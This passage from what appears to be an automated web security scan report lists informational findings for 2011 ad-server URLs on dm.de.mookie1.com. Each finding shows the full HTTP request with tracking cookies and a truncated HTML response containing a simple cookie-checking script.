Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660; session=1296256112|1296266487

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.66. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11687741401@x23

Request

GET /2/B3DM/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.67. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1169827066@x23

Request

GET /2/B3DM/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.68. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11711169344@x23

Request

GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2453
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.69. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/117382567@x23

Request

GET /2/B3DM/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:51:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.70. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11819507567@x23

Request

GET /2/B3DM/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:15:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.71. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11824141209@x23

Request

GET /2/B3DM/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:08:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.72. http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11911576582@x23

Request

GET /2/B3DM/2010DM/11911576582@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660; session=1296256112|1296268201

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.73. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11940003036@x23

Request

GET /2/B3DM/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.74. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12000985820@x23

Request

GET /2/B3DM/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:55:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.75. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12037650882@x23

Request

GET /2/B3DM/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:03:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.76. http://dm.de.mookie1.com/2/B3DM/2010DM/12119796835@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12119796835@x23

Request

GET /2/B3DM/2010DM/12119796835@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.77. http://dm.de.mookie1.com/2/B3DM/2010DM/12145795389@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12145795389@x23

Request

GET /2/B3DM/2010DM/12145795389@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268925

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.78. http://dm.de.mookie1.com/2/B3DM/2010DM/122038498@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/122038498@x23

Request

GET /2/B3DM/2010DM/122038498@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660; session=1296256112|1296266789

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1334085935@x23

Request

GET /2/B3DM/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1394936567@x23

Request

GET /2/B3DM/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
